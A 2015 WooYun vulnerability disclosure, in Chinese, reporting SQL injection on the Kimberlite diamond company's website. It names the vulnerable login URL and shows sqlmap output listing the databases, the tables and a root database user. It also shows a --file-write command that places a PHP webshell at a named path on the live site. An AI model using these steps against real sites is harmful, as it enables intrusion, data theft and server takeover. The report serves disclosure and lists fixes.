当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157415

漏洞标题:金伯利钻石官网存在SQL注入

相关厂商:金伯利钻石

漏洞作者: 路人甲

提交时间:2015-12-01 20:32

修复时间:2016-01-15 20:34

公开时间:2016-01-15 20:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金伯利钻石官网存在SQL注入,可以得到webshell。

详细说明:

sqlmap盲注

漏洞证明:

登录界面

http://www.kimberlite.com.cn/index.php?r=site/flogin


123.PNG


注入得到的数据库

web application technology: PHP 5.6.15, Nginx
back-end DBMS: MySQL 5.0.11
available databases [6]:
[*] information_schema
[*] kella
[*] kimberlite
[*] mysql
[*] performance_schema
[*] test


注入得到kimberlite的表

<code>Database: kimberlite
[25 tables]
+------------------+
| join |
| user |
| application |
| brand |
| caption |
| classic |
| classic_list |
| config |
| desginer |
| desginer_list |
| huodong |
| images |
| jiamengshang |
| jm |
| kd_list |
| member |
| new_push |
| news |
| picture |
| product |
| product_categroy |
| product_type |
| source |
| story_video |
| zuanshi |
+------------------+


查看用户权限

current user:    'root@%'


有权限写文件

--file-write http://www.kimberlite.com.cn/assets/197aed28/js.php


得到webshell

1233.PNG


修复方案:

1.用户权限最小化
2.使用预编译语句

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)